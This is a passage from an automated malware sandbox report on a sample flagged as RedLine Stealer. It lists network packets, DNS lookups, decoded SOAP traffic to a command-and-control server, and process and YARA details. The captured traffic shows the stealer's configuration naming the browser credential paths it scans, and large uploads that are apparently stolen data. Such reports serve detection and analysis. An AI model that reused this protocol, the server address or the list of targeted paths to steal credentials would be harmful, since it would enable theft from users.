                                                                                                                                    Mar 8, 2025 00:46:33.026710987 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026722908 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026734114 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026746035 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026757956 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026768923 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026779890 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026804924 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026817083 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026828051 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026839972 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026850939 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026861906 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026873112 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026885033 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026896000 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026906967 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026917934 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026928902 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026940107 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026951075 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026962042 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026973009 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026983976 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.026995897 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027007103 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027018070 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027029037 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027040005 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027051926 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027062893 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027076006 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027100086 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027112007 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027122974 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027133942 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027146101 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027157068 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027390003 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027401924 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027487993 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027499914 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027512074 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:33.027523041 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:34.037242889 CET556154972345.137.22.163192.168.2.4
                                                                                                                                    Mar 8, 2025 00:46:34.051728010 CET4972155615192.168.2.445.137.22.163
                                                                                                                                    Mar 8, 2025 00:46:34.051791906 CET4972355615192.168.2.445.137.22.163

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Mar 8, 2025 00:46:25.560702085 CET6059553192.168.2.41.1.1.1
                                                                                                                                    Mar 8, 2025 00:46:25.568561077 CET53605951.1.1.1192.168.2.4

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Mar 8, 2025 00:46:25.560702085 CET192.168.2.41.1.1.10xfeb0Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Mar 8, 2025 00:46:25.568561077 CET1.1.1.1192.168.2.40xfeb0No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Mar 8, 2025 00:46:25.568561077 CET1.1.1.1192.168.2.40xfeb0No error (0)api.ip.sb.cdn.cloudflare.net172.67.75.172A (IP address)IN (0x0001)false
                                                                                                                                    Mar 8, 2025 00:46:25.568561077 CET1.1.1.1192.168.2.40xfeb0No error (0)api.ip.sb.cdn.cloudflare.net104.26.12.31A (IP address)IN (0x0001)false
                                                                                                                                    Mar 8, 2025 00:46:25.568561077 CET1.1.1.1192.168.2.40xfeb0No error (0)api.ip.sb.cdn.cloudflare.net104.26.13.31A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • api.ip.sb
                                                                                                                                    • 45.137.22.163:55615

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.44971345.137.22.163556157972C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Mar 8, 2025 00:46:19.557743073 CET240OUTPOST / HTTP/1.1
                                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                                    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                    Host: 45.137.22.163:55615
                                                                                                                                    Content-Length: 137
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Mar 8, 2025 00:46:20.189599037 CET359INHTTP/1.1 200 OK
                                                                                                                                    Content-Length: 212
                                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                    Date: Fri, 07 Mar 2025 23:46:20 GMT
                                                                                                                                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                    Mar 8, 2025 00:46:25.234813929 CET223OUTPOST / HTTP/1.1
                                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                                    SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                    Host: 45.137.22.163:55615
                                                                                                                                    Content-Length: 144
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Mar 8, 2025 00:46:25.415061951 CET25INHTTP/1.1 100 Continue
                                                                                                                                    Mar 8, 2025 00:46:25.518446922 CET1236INHTTP/1.1 200 OK
                                                                                                                                    Content-Length: 4792
                                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                    Date: Fri, 07 Mar 2025 23:46:25 GMT
                                                                                                                                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                                                                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>191.101.157.51</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\ [TRUNCATED]


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.44972145.137.22.163556157972C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Mar 8, 2025 00:46:30.159332037 CET221OUTPOST / HTTP/1.1
                                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                                    SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                    Host: 45.137.22.163:55615
                                                                                                                                    Content-Length: 929468
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Mar 8, 2025 00:46:32.530328989 CET294INHTTP/1.1 200 OK
                                                                                                                                    Content-Length: 147
                                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                    Date: Fri, 07 Mar 2025 23:46:32 GMT
                                                                                                                                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.44972345.137.22.163556157972C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Mar 8, 2025 00:46:32.540575027 CET241OUTPOST / HTTP/1.1
                                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                                    SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                    Host: 45.137.22.163:55615
                                                                                                                                    Content-Length: 929460
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Mar 8, 2025 00:46:34.037242889 CET408INHTTP/1.1 200 OK
                                                                                                                                    Content-Length: 261
                                                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                    Date: Fri, 07 Mar 2025 23:46:33 GMT
                                                                                                                                    Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                    Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.449716172.67.75.1724437972C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-03-07 23:46:27 UTC64OUTGET /geoip HTTP/1.1
                                                                                                                                    Host: api.ip.sb
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2025-03-07 23:46:28 UTC947INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 07 Mar 2025 23:46:28 GMT
                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJlbiLNr%2BTYZwusuDb7KA8F9OtfwliBJ9uBc3tXXdurjKuQzV%2FmTmPLaNEIL3xg%2B83HA4oZdc7b56puuSvngSm4Vf7OQhAatX%2Fs947b1sEC9n1zOLYmu%2BdIHzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 91cdf8eb5c682e17-DFW
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=22461&min_rtt=20278&rtt_var=9163&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2802&recv_bytes=678&delivery_rate=181674&cwnd=252&unsent_bytes=0&cid=bb179ee7a4bdc2b6&ts=860&x=0"
                                                                                                                                    2025-03-07 23:46:28 UTC348INData Raw: 31 35 35 0d 0a 7b 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 47 54 48 6f 73 74 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 36 2e 38 30 32 32 2c 22 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 43 68 69 63 61 67 6f 22 2c 22 69 73 70 22 3a 22 47 54 48 6f 73 74 22 2c 22 6f 66 66 73 65 74 22 3a 2d 32 31 36 30 30 2c 22 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 22 61 73 6e 22 3a 36 33 30 32 33 2c 22 61 73 6e 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 2d 47 4c 4f 42 41 4c 54 45 4c 45 48 4f 53 54 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 70 22 3a 22 33 38 2e 36 38 2e 31 33 34 2e 32 35 31 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33
                                                                                                                                    Data Ascii: 155{"organization":"GTHost","longitude":-96.8022,"city":"Dallas","timezone":"America\/Chicago","isp":"GTHost","offset":-21600,"region":"Texas","asn":63023,"asn_organization":"AS-GLOBALTELEHOST","country":"United States","ip":"38.68.134.251","latitude":3
                                                                                                                                    2025-03-07 23:46:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:18:46:15
                                                                                                                                    Start date:07/03/2025
                                                                                                                                    Path:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\PalEak0Yh6.exe"
                                                                                                                                    Imagebase:0x410000
                                                                                                                                    File size:605'184 bytes
                                                                                                                                    MD5 hash:C69B2B190F08DC6BB255A2C0CE1C148B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1213688034.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1213688034.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1213688034.0000000003819000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1213688034.0000000003851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1213688034.0000000003851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1213688034.0000000003851000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:18:46:17
                                                                                                                                    Start date:07/03/2025
                                                                                                                                    Path:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\user\Desktop\PalEak0Yh6.exe"
                                                                                                                                    Imagebase:0x1f0000
                                                                                                                                    File size:605'184 bytes
                                                                                                                                    MD5 hash:C69B2B190F08DC6BB255A2C0CE1C148B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:18:46:17
                                                                                                                                    Start date:07/03/2025
                                                                                                                                    Path:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\user\Desktop\PalEak0Yh6.exe"
                                                                                                                                    Imagebase:0x90000
                                                                                                                                    File size:605'184 bytes
                                                                                                                                    MD5 hash:C69B2B190F08DC6BB255A2C0CE1C148B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:18:46:17
                                                                                                                                    Start date:07/03/2025
                                                                                                                                    Path:C:\Users\user\Desktop\PalEak0Yh6.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\PalEak0Yh6.exe"
                                                                                                                                    Imagebase:0x670000
                                                                                                                                    File size:605'184 bytes
                                                                                                                                    MD5 hash:C69B2B190F08DC6BB255A2C0CE1C148B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000004.00000002.1361632344.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:18:46:17
                                                                                                                                    Start date:07/03/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff62fc20000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >